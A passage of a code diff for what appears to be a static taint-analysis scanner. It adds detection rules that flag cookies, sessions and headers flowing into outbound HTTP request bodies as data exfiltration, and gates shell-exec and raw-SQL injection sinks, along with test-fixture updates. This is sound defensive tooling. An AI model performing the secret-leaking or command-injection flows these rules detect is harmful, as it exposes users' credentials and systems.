+ // This is a heuristic — the real egress happens at urlopen, but tracking + // the data flow through the constructor is a fair static approximation. + SinkGate { + callee_matcher: "urllib.request.Request", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data"], + }, + }, ]; pub static KINDS: Map<&'static str, Kind> = phf_map! { diff --git a/src/labels/ruby.rs b/src/labels/ruby.rs index cceecead..0dc5d1ac 100644 --- a/src/labels/ruby.rs +++ b/src/labels/ruby.rs @@ -28,6 +28,16 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Source(Cap::all()), case_sensitive: false, }, + // Sensitive request state: cookies and session stores carry auth material + // / CSRF tokens / signed user ids the operator did not intend to leak. + // `infer_source_kind` routes substrings containing "cookie" or "session" + // through `SourceKind::Cookie` (Sensitive), so flow into outbound request + // payloads activates the `DATA_EXFIL` cap added below. + LabelRule { + matchers: &["request.cookies", "request.session", "cookies", "session"], + label: DataLabel::Source(Cap::all()), + case_sensitive: false, + }, // ───────── Sanitizers ────────── LabelRule { matchers: &["CGI.escapeHTML", "ERB::Util.html_escape"], @@ -135,6 +145,55 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::SSRF), case_sensitive: false, }, + // ── Cross-boundary data exfiltration ────────────────────────────────── + // + // Body-bearing outbound HTTP verb methods. A flat Sink(DATA_EXFIL) here + // composes with the SSRF rule above via multi-label classification: + // `Net::HTTP.post(uri, payload)` reports SSRF on the URL flow (arg 0) + // and DATA_EXFIL on the body flow (arg 1+) as separate findings. 
The + // source-sensitivity gate in `effective_sink_caps` strips DATA_EXFIL + // when the contributing source is `Plain` (raw `params`), so this only + // fires for sensitive sources (cookies / session / env / headers / + // file / db reads). + // + // Covered clients: + // * `Net::HTTP.post(uri, data, headers)` — stdlib + // * `Net::HTTP::Post.new(path)` body= setter — emitted as + // `Net::HTTP::Post.body=` after Ruby setter normalisation; flat rule + // ensures any tainted assignment to `.body` smears into the request + // * `RestClient.post(url, payload, headers)` — rest-client gem + // * `Faraday.post(url, body, headers)` — faraday + // * `HTTParty.post(url, body: ..., headers: ...)` — already a Sink(SSRF) + // above, DATA_EXFIL adds independently + // * `Typhoeus.post(url, body: ...)` — typhoeus + LabelRule { + matchers: &[ + "Net::HTTP.post", + "RestClient.post", + "RestClient.put", + "RestClient.patch", + "Faraday.post", + "Faraday.put", + "Faraday.patch", + "HTTParty.post", + "HTTParty.put", + "HTTParty.patch", + "Typhoeus.post", + "Typhoeus.put", + "Typhoeus.patch", + ], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + }, + // Generic outbound-method suffix matchers for chained / typed receivers + // (e.g. `client.post(payload)` where `client` is a configured Faraday or + // RestClient instance). Suffix-match keeps the rule compact; source + // sensitivity gates noise from plain user input. 
+ LabelRule { + matchers: &["HttpClient.post", "HttpClient.put", "HttpClient.patch"], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + }, LabelRule { matchers: &["Marshal.load", "Marshal.restore", "YAML.load"], label: DataLabel::Sink(Cap::DESERIALIZE), diff --git a/src/labels/rust.rs b/src/labels/rust.rs index 68826c11..da6255d7 100644 --- a/src/labels/rust.rs +++ b/src/labels/rust.rs @@ -19,6 +19,34 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Source(Cap::all()), case_sensitive: false, }, + // Inbound HTTP request metadata: headers, cookies, query strings, + // and body extractors. These only carry caller-supplied bytes when + // the framework binds them (the framework-conditional rules attach + // the same labels for axum / actix / rocket extractors). Including + // the bare suffix matchers here means a `req.headers().get("h")` + // chain in non-framework code (e.g. internal helpers that take an + // `&HeaderMap`) still surfaces as a Source. `infer_source_kind` + // routes these to `Header` / `Cookie` (Sensitive), enabling + // DATA_EXFIL gating downstream. + LabelRule { + matchers: &[ + // Type-qualified (receiver typed as HttpRequest, HeaderMap, ...) + "HttpRequest.headers", + "HttpRequest.cookie", + "HttpRequest.cookies", + "Request.headers", + "Request.cookies", + "Request.uri", + // Bare HeaderMap / cookie-jar accessors. 
+ "headers.get", + "headers.get_all", + "CookieJar.get", + "CookieJar.get_private", + "CookieJar.get_signed", + ], + label: DataLabel::Source(Cap::all()), + case_sensitive: false, + }, // ───────── Sanitizers ────────── LabelRule { matchers: &["html_escape::encode_safe", "sanitize_", "sanitize_html"], @@ -75,6 +103,34 @@ pub static RULES: &[LabelRule] = &[ "reqwest::Client.head", "reqwest::Client.patch", "reqwest::Client.request", + // Chained constructor + verb form: `reqwest::Client::new() + // .post(url)` reduces (via root-receiver collapse) to chain + // text `Client::new.post`, so existing `Client.post` matchers + // miss it. Cover the chained shape directly. + "Client::new.get", + "Client::new.post", + "Client::new.put", + "Client::new.delete", + "Client::new.head", + "Client::new.patch", + "Client::new.request", + // surf free verbs are themselves SSRF gates , the URL is + // their first positional argument. + "surf::get", + "surf::post", + "surf::put", + "surf::delete", + "surf::head", + "surf::patch", + "surf::connect", + "surf::trace", + // ureq free verbs are HTTP request initiators. + "ureq::get", + "ureq::post", + "ureq::put", + "ureq::delete", + "ureq::patch", + "ureq::head", // Type-qualified (receiver typed as HttpClient) "HttpClient.get", "HttpClient.post", @@ -89,6 +145,68 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::SSRF), case_sensitive: false, }, + // Cross-boundary data exfiltration sinks. Outbound HTTP egress where + // a Sensitive source (env, header, cookie, file, db) reaching the + // request body / payload is a leak distinct from SSRF. Plain user + // input is silenced by the source-sensitivity gate, so these only + // fire when the source carries operator-bound state. + // + // Body-binding methods on the request builder: `body`, `json`, `form`, + // `multipart` (reqwest); `body_string`, `body_json`, `body_bytes` + // (surf); `send_string`, `send_json`, `send_form` (ureq, which + // combines body-bind and dispatch). 
Plus `.send()` on an HttpClient + // / RequestBuilder, where the chain receiver is typed. Chain text + // matchers like `body.send` cover the all-in-one form + // `Client::post(url).body(payload).send()`. + LabelRule { + matchers: &[ + // Type-qualified terminal verbs (split form, typed receiver). + "HttpClient.send", + "HttpClient.execute", + "RequestBuilder.send", + // Type-qualified body-bind methods on a typed RequestBuilder. + "RequestBuilder.body", + "RequestBuilder.json", + "RequestBuilder.form", + "RequestBuilder.multipart", + "RequestBuilder.body_string", + "RequestBuilder.body_json", + "RequestBuilder.body_bytes", + "RequestBuilder.send_string", + "RequestBuilder.send_json", + "RequestBuilder.send_form", + // surf / ureq method names that are unambiguous in Rust , + // they only appear on HTTP request builders, so a bare-name + // suffix matcher is safe. + "body_string", + "body_json", + "body_bytes", + "send_string", + "send_json", + "send_form", + // Reqwest chain shapes. After paren-group strip the chain + // text becomes `Client::post.body.send`, so the body-bind + // verb sits before `.send` and a `body.send` suffix matcher + // pins exfil-only firing to chains that actually bind a body. + "body.send", + "json.send", + "form.send", + "multipart.send", + // hyper Request::builder().method(...).body(payload) , the + // body-bind step is the leak point. `.unwrap` is a common + // trailing identity method; we cover both shapes. + "Request::builder.body", + "Request::builder.method.body", + "Request::builder.method.body.unwrap", + "Request::builder.body.unwrap", + // Two-step reqwest where the user has a dedicated `Client` + // variable and uses `.execute(req)` on it. 
+ "Client::new.send", + "Client::new.execute", + ], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + }, LabelRule { matchers: &[ "rusqlite::Connection.execute", diff --git a/src/labels/typescript.rs b/src/labels/typescript.rs index fdc37e89..a5f5c413 100644 --- a/src/labels/typescript.rs +++ b/src/labels/typescript.rs @@ -92,6 +92,22 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sanitizer(Cap::HTML_ESCAPE), case_sensitive: false, }, + // Conventional forwarding wrappers, telemetry / analytics / metrics dispatch. + // See javascript.rs for rationale; mirrored here so TypeScript projects pick + // up the same convention. Override per-project via + // [analysis.languages.typescript] custom rules. + LabelRule { + matchers: &[ + "serializeForUpstream", + "forwardPayload", + "tracker.send", + "analytics.track", + "metrics.report", + "logEvent", + ], + label: DataLabel::Sanitizer(Cap::DATA_EXFIL), + case_sensitive: false, + }, // Conventional project-local HTML escapers. Suffix word-boundary match // fires on bare calls to locally defined helpers (`function escapeHtml(x)` // invoked as `escapeHtml(x)`) across codebases that follow the common @@ -113,18 +129,21 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::HTML_ESCAPE), case_sensitive: false, }, + // Shell-exec sinks. Qualified `child_process.*` and bare forms are both + // flat sinks; receiver-name collisions are handled via EXCLUDES; the + // `=*` gates in `GATED_SINKS` below restrict checked args to arg 0 + // (command string) so `execSync(cmd, { env: process.env })` no longer + // flags `process.env` flowing into the options object. See + // javascript.rs for full rationale. 
LabelRule { matchers: &[ "child_process.exec", "child_process.execSync", "child_process.spawn", "child_process.execFile", - // Bare forms from destructured imports: - // const { exec, execSync } = require('child_process') "exec", "execSync", "execFile", - // Common promisified wrappers around child_process.exec "execAsync", "execPromise", ], @@ -227,16 +246,12 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::SQL_QUERY), case_sensitive: false, }, - // ORM / query builder raw-SQL entry points + // ORM / query builder raw-SQL entry points. `$queryRawUnsafe` / + // `$executeRawUnsafe` are gated below — only arg 0 (the SQL template) is + // the injection vector; positional bind params are bound as `$1..$N`. + // See javascript.rs for the full rationale. LabelRule { - matchers: &[ - "sequelize.query", - "knex.raw", - "$queryRaw", - "$queryRawUnsafe", - "$executeRaw", - "$executeRawUnsafe", - ], + matchers: &["sequelize.query", "knex.raw", "$queryRaw", "$executeRaw"], label: DataLabel::Sink(Cap::SQL_QUERY), case_sensitive: true, }, @@ -264,6 +279,9 @@ pub static EXCLUDES: &[&str] = &[ "req.app", "req.route", "req.next", + // Dockerode container API — see javascript.rs EXCLUDES for rationale. + "container.exec", + "exec.start", ]; pub static GATED_SINKS: &[SinkGate] = &[ @@ -478,6 +496,113 @@ pub static GATED_SINKS: &[SinkGate] = &[ object_destination_fields: &["body", "headers", "json"], }, }, + // ── Shell-exec sinks (SHELL_ESCAPE) ────────────────────────────────── + // See javascript.rs for the rationale. Only arg 0 (command string) + // carries the shell-injection payload; bare forms use `=` exact-only + // matching so they don't collide with any `.exec` method. + // Qualified `child_process.*` forms stay as flat sinks; gates only fire + // when no flat sink classifies the call, so the bare destructured-import + // forms below are the only place where shell-exec needs gating. 
+ SinkGate { + callee_matcher: "=exec", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execSync", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execFile", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execAsync", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execPromise", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // ── Prisma raw-SQL with positional bind params (SQL_QUERY) ─────────── + // See javascript.rs for rationale. 
+ SinkGate { + callee_matcher: "$queryRawUnsafe", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SQL_QUERY), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "$executeRawUnsafe", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SQL_QUERY), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, ]; pub static KINDS: Map<&'static str, Kind> = phf_map! { diff --git a/src/output.rs b/src/output.rs index 86e257c9..73b5d5d2 100644 --- a/src/output.rs +++ b/src/output.rs @@ -207,6 +207,18 @@ pub fn build_sarif(diags: &[Diag], scan_root: &Path) -> Value { props.insert("confidence".into(), json!(conf.to_string())); } + // `DATA_EXFIL` findings carry the destination object-literal + // field the leak reached (`body` / `headers` / `json`); surface + // it so SARIF consumers can pivot per-destination without + // reparsing the message. + if let Some(field) = d + .evidence + .as_ref() + .and_then(|ev| ev.data_exfil_field.as_deref()) + { + props.insert("data_exfil_field".into(), json!(field)); + } + // Alternative-path cross-references. 
When the dedup pass // at `taint::analyse_file` preserves both a validated and // an unvalidated flow for the same `(body, sink, source)`, diff --git a/src/pointer/analysis.rs b/src/pointer/analysis.rs index b7364441..c0a6a743 100644 --- a/src/pointer/analysis.rs +++ b/src/pointer/analysis.rs @@ -666,6 +666,8 @@ mod tests { exception_edges: vec![], field_interner: self.field_interner, field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } } @@ -880,6 +882,8 @@ mod tests { exception_edges: vec![], field_interner: FieldInterner::new(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let facts = analyse_body(&body, body_id()); assert!(facts.is_trivial()); diff --git a/src/rank.rs b/src/rank.rs index 217d4fc4..d44fbac9 100644 --- a/src/rank.rs +++ b/src/rank.rs @@ -206,7 +206,16 @@ pub fn rank_diags(diags: &mut [Diag]) { /// Bonus based on analysis kind inferred from rule ID + evidence. fn analysis_kind_bonus(rule_id: &str, evidence: Option<&Evidence>) -> f64 { - if rule_id.starts_with("taint-") { + if rule_id.starts_with("taint-data-exfiltration") { + // DATA_EXFIL ranks below SSRF / SQLi / CMDi: the leak class is + // a softer signal than direct payload-driven exploitation, so + // the taint-class bonus is trimmed (-3) to seat data-exfil + // findings between general taint flows and AST/CFG patterns. + // The source-kind bonus (`evidence_strength`) already separates + // cookie / env / header from less attacker-relevant origins, + // so this bonus is the only ranking discount applied. 
+ 7.0 + } else if rule_id.starts_with("taint-") { // Taint-confirmed flow is the strongest signal 10.0 } else if rule_id.starts_with("state-") { diff --git a/src/server/debug.rs b/src/server/debug.rs index 581264f6..46bf3ee0 100644 --- a/src/server/debug.rs +++ b/src/server/debug.rs @@ -1179,6 +1179,7 @@ fn type_kind_tag(k: &TypeKind) -> String { TypeKind::Url => "Url".into(), TypeKind::HttpClient => "HttpClient".into(), TypeKind::LocalCollection => "LocalCollection".into(), + TypeKind::RequestBuilder => "RequestBuilder".into(), TypeKind::Dto(_) => "Dto".into(), } } @@ -1872,6 +1873,7 @@ function consume() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); @@ -2026,6 +2028,8 @@ async function recentAuditLogs() { exception_edges: vec![], field_interner, field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let facts = analyse_body(&body, BodyId(0)); diff --git a/src/server/owasp.rs b/src/server/owasp.rs index 0ca9c16a..c4dafb0a 100644 --- a/src/server/owasp.rs +++ b/src/server/owasp.rs @@ -104,6 +104,14 @@ pub fn issue_categories( } fn issue_category_label(rule_id: &str) -> &'static str { + // `taint-data-exfiltration` and the legacy `taint-unsanitised-flow` + // share the `taint` family token, but the exfil class targets a + // different threat (sensitive data leaving the trust boundary, not + // attacker payload entering it). Surface it as its own bucket so the + // dashboard category badge matches the rule semantics. 
+ if rule_id.starts_with("taint-data-exfiltration") { + return "Data Exfiltration"; + } match extract_family(rule_id) { "sqli" => "SQL Injection", "xss" => "Cross-Site Scripting", @@ -221,6 +229,26 @@ mod tests { assert_eq!(out[2].count, 2); } + #[test] + fn issue_category_label_routes_data_exfil_to_dedicated_bucket() { + // `taint-data-exfiltration` shares the `taint` family token with + // `taint-unsanitised-flow`, but exfil findings need their own + // dashboard badge so analysts can pivot on the leak class. + assert_eq!( + issue_category_label("taint-data-exfiltration"), + "Data Exfiltration" + ); + assert_eq!( + issue_category_label("taint-data-exfiltration (source 1:1)"), + "Data Exfiltration" + ); + // Generic taint findings stay in the broader bucket. + assert_eq!( + issue_category_label("taint-unsanitised-flow"), + "Tainted Flow" + ); + } + #[test] fn issue_category_label_recognises_simple_families() { assert_eq!( diff --git a/src/server/routes/debug.rs b/src/server/routes/debug.rs index 8df3de01..de913e90 100644 --- a/src/server/routes/debug.rs +++ b/src/server/routes/debug.rs @@ -445,6 +445,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, )], ) @@ -516,6 +517,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }, false, false, @@ -538,6 +541,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }, true, true, @@ -560,6 +565,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }, true, 
false, @@ -656,6 +663,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, )], ) diff --git a/src/ssa/alias.rs b/src/ssa/alias.rs index a3c01371..ac7a6973 100644 --- a/src/ssa/alias.rs +++ b/src/ssa/alias.rs @@ -217,6 +217,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } diff --git a/src/ssa/const_prop.rs b/src/ssa/const_prop.rs index 9dfcc470..fb0c7e7d 100644 --- a/src/ssa/const_prop.rs +++ b/src/ssa/const_prop.rs @@ -638,6 +638,8 @@ mod tests { exception_edges: Vec::new(), field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } diff --git a/src/ssa/copy_prop.rs b/src/ssa/copy_prop.rs index fb18c2ec..5b4f355e 100644 --- a/src/ssa/copy_prop.rs +++ b/src/ssa/copy_prop.rs @@ -215,6 +215,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let (eliminated, copy_map) = copy_propagate(&mut body, &cfg); @@ -296,6 +298,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let (eliminated, copy_map) = copy_propagate(&mut body, &cfg); @@ -366,6 +370,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; (cfg, body) } @@ -488,6 +494,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), 
field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let (eliminated, _map) = copy_propagate(&mut body, &cfg); assert_eq!(eliminated, 0, "two-operand Assign is not a copy"); @@ -567,6 +575,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let (eliminated, _) = copy_propagate(&mut body, &cfg); assert_eq!(eliminated, 1, "v1 should be eliminated"); @@ -664,6 +674,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let (eliminated, _map) = copy_propagate(&mut body, &cfg); assert_eq!(eliminated, 1); @@ -712,6 +724,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let (eliminated, map) = copy_propagate(&mut body, &cfg); assert_eq!(eliminated, 0); diff --git a/src/ssa/dce.rs b/src/ssa/dce.rs index 0ec7812e..1bbb328d 100644 --- a/src/ssa/dce.rs +++ b/src/ssa/dce.rs @@ -217,6 +217,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -265,6 +267,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -314,6 +318,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: 
std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -359,6 +365,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -396,6 +404,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -460,6 +470,8 @@ mod tests { exception_edges: vec![], field_interner: interner, field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -527,6 +539,8 @@ mod tests { exception_edges: vec![], field_interner: interner, field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -587,6 +601,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -637,6 +653,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); @@ -724,6 +742,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = 
eliminate_dead_defs(&mut body, &cfg); @@ -801,6 +821,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let removed = eliminate_dead_defs(&mut body, &cfg); diff --git a/src/ssa/invariants.rs b/src/ssa/invariants.rs index 5705aba8..774a9b14 100644 --- a/src/ssa/invariants.rs +++ b/src/ssa/invariants.rs @@ -788,6 +788,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let errs = check_structural_invariants(&body); assert!( @@ -835,6 +837,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let errs = check_structural_invariants(&body); assert!( @@ -885,6 +889,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let errs = check_structural_invariants(&body); assert!( @@ -913,6 +919,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let errs = check_structural_invariants(&body); assert!( diff --git a/src/ssa/ir.rs b/src/ssa/ir.rs index 94b9c882..112adae0 100644 --- a/src/ssa/ir.rs +++ b/src/ssa/ir.rs @@ -4,7 +4,7 @@ use crate::ssa::type_facts::TypeKind; use petgraph::graph::NodeIndex; use serde::{Deserialize, Serialize}; use smallvec::SmallVec; -use std::collections::HashMap; +use std::collections::{HashMap, HashSet}; /// Unique identifier for an SSA value (one per definition point). 
#[derive(Clone, Copy, Debug, PartialEq, Eq, Hash, PartialOrd, Ord, Serialize, Deserialize)] @@ -353,6 +353,26 @@ pub struct SsaBody { /// cleanly with an empty map (no migration needed). #[serde(default)] pub field_writes: HashMap, + /// SSA values that lowering injected for **free / closure-captured** + /// variables (variables referenced by the body but not declared as + /// formal parameters and not assigned within the body). + /// + /// Lowering models every external use as an [`SsaOp::Param`] in block + /// 0 so the rename pass can reference it. Real formal parameters and + /// closure captures end up using the same op variant; this side-table + /// distinguishes the two so downstream analyses (in particular the + /// JS/TS handler-name auto-seed in + /// [`crate::taint::ssa_transfer`]) can avoid treating closure + /// captures as if they were the function's own parameters. Without + /// this distinction, a lambda body that references an out-of-scope + /// `userId` / `cmd` / `payload` would have the synthetic Param + /// auto-seeded as `UserInput`, producing a phantom source on the + /// enclosing function's declaration line. + /// + /// `#[serde(default)]` for backward compatibility with summary blobs + /// produced before this field existed. + #[serde(default)] + pub synthetic_externals: HashSet, } impl SsaBody { @@ -560,6 +580,7 @@ mod tests { exception_edges: vec![], field_interner: FieldInterner::new(), field_writes: HashMap::new(), + synthetic_externals: HashSet::new(), }; let fid = body.intern_field("mu"); body.blocks[0].body.push(SsaInst { diff --git a/src/ssa/lower.rs b/src/ssa/lower.rs index 9ab2ca86..c8b3b12d 100644 --- a/src/ssa/lower.rs +++ b/src/ssa/lower.rs @@ -239,18 +239,25 @@ fn lower_to_ssa_inner( // 6. 
Rename variables (dominator tree preorder walk) let dom_tree_children = build_dom_tree_children(num_blocks, &doms, &block_graph); - let (mut ssa_blocks, mut value_defs, cfg_node_map, field_interner, field_writes) = - rename_variables( - cfg, - &blocks_nodes, - &block_succs, - &block_preds, - &phi_placements, - &dom_tree_children, - &filtered_edges, - &external_vars, - &nop_nodes, - ); + let ( + mut ssa_blocks, + mut value_defs, + cfg_node_map, + field_interner, + field_writes, + synthetic_externals, + ) = rename_variables( + cfg, + &blocks_nodes, + &block_succs, + &block_preds, + &phi_placements, + &dom_tree_children, + &filtered_edges, + &external_vars, + formal_params, + &nop_nodes, + ); // 6b. Fill any missing phi operands with a shared Undef sentinel so // every phi has exactly one operand per predecessor. See @@ -306,6 +313,7 @@ fn lower_to_ssa_inner( exception_edges, field_interner, field_writes, + synthetic_externals, }; // 9. Catch-block reachability invariant. @@ -927,6 +935,7 @@ fn rename_variables( dom_tree_children: &[Vec], filtered_edges: &[(NodeIndex, NodeIndex, EdgeKind)], external_vars: &[String], + formal_params: &[String], nop_nodes: &HashSet, ) -> ( Vec, @@ -934,6 +943,7 @@ fn rename_variables( HashMap, crate::ssa::ir::FieldInterner, HashMap, + HashSet, ) { let num_blocks = blocks_nodes.len(); let mut next_value: u32 = 0; @@ -1679,6 +1689,27 @@ fn rename_variables( // Inject synthetic Param instructions at START of block 0 for external variables. // These create SSA definitions so the rename pass can reference them. // Pre-seed var_stacks so process_block sees them. + // + // `external_vars` contains both real formal parameters and free / closure- + // captured variables (variables read by the body but not declared as a + // formal and not assigned anywhere). 
Both end up emitted as + // [`SsaOp::Param`] in block 0; we record the SSA values that correspond + // to free vars in `synthetic_externals` so downstream analyses (the JS/TS + // handler-name auto-seed in particular) can avoid treating closure + // captures as if they were parameters of the function under analysis. + // + // **Conservative behaviour when `formal_params` is empty.** Several + // call sites (`lower_to_ssa`, `lower_to_ssa_scoped_nop`) don't supply + // formal parameter names; in that case we cannot distinguish formals + // from free vars structurally, so we leave `synthetic_externals` empty + // and the auto-seed pass keeps its pre-fix behaviour of treating every + // `Param` op as a candidate. Only callers that pass a non-empty + // `formal_params` slice (`lower_to_ssa_with_params`, used by the + // findings pipeline's per-function lowering) opt into the + // closure-capture distinction. + let mut synthetic_externals: HashSet = HashSet::new(); + let formal_set: HashSet<&str> = formal_params.iter().map(|s| s.as_str()).collect(); + let track_synthetic = !formal_params.is_empty(); if !external_vars.is_empty() { let entry_cfg_node = blocks_nodes[0][0]; let mut synthetic_body = Vec::with_capacity(external_vars.len()); @@ -1691,7 +1722,8 @@ fn rename_variables( cfg_node: entry_cfg_node, block: BlockId(0), }); - let op = if is_receiver_name(var) { + let is_receiver = is_receiver_name(var); + let op = if is_receiver { SsaOp::SelfParam } else { let op = SsaOp::Param { @@ -1700,6 +1732,28 @@ fn rename_variables( positional_idx += 1; op }; + // A non-receiver var is "synthetic" (a free / closure capture) + // when it is *not* one of the function's declared 